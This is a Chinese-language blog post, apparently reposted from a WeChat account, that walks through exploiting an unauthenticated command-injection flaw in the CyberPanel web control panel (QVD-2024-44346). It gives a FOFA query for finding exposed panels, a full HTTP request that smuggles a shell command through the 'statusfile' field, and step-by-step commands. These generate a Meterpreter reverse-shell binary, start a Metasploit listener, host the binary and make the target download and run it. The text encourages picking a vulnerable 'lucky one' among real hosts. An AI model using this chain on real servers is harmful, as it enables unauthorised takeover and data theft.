深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

CyberPanel是一个开源的Web控制面板，它提供了一个用户友好的界面，用于管理网站、电子邮件9、数据库、FTP账户等。

CyberPanel旨在简化网站管理任务，使非技术用户也能轻松管理自己的在线资源。

该漏洞源于upgrademysqlstatus接口未做身份验证Q 和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。目前该漏洞技术细节与EXP已在互联网上公开，鉴于该漏洞影响范围较大，建议用户尽快做好自查及防护。

FOFA

app="CyberPanel"

漏洞复现

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Content-Type: application/jsonConnection: close{"statusfile":"/dev/null; id; #"}

如果没有真实的环境和深入的手法，我估计你们也很难理解，来吧，小龙带你们整

1、首先利用漏洞检测脚本进行检测

2、然后去到kali上面利用msfvenom生成马子

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=171.42.31.45 lport=4001 -f elf > test666

3、生成之后msf设置监听

use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.1.100set lport 4001run

4、然后利用Python -m http.server把刚刚生成的马子放到网页上

接下来我们在bp中挑选一位存在漏洞的幸运儿

5、用这一段把原来检测用的命令给替换掉

wget -O ./test666 http://IP:8000/test666

点击发送

然后再写上

./test666

6、这会儿就能看到msf成功上线了

免责声明

我们红岸基地网安教学，只有两个老师、一个是赵小龙老师、一个是陈师傅。可以联系微信:Changethe_one,只要你提供目前的现状与学历，陈老师可以免费帮大家做职业规划。

Changethe_one

👇👇👇

原文始发于微信公众号（暗影网安实验室）：深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战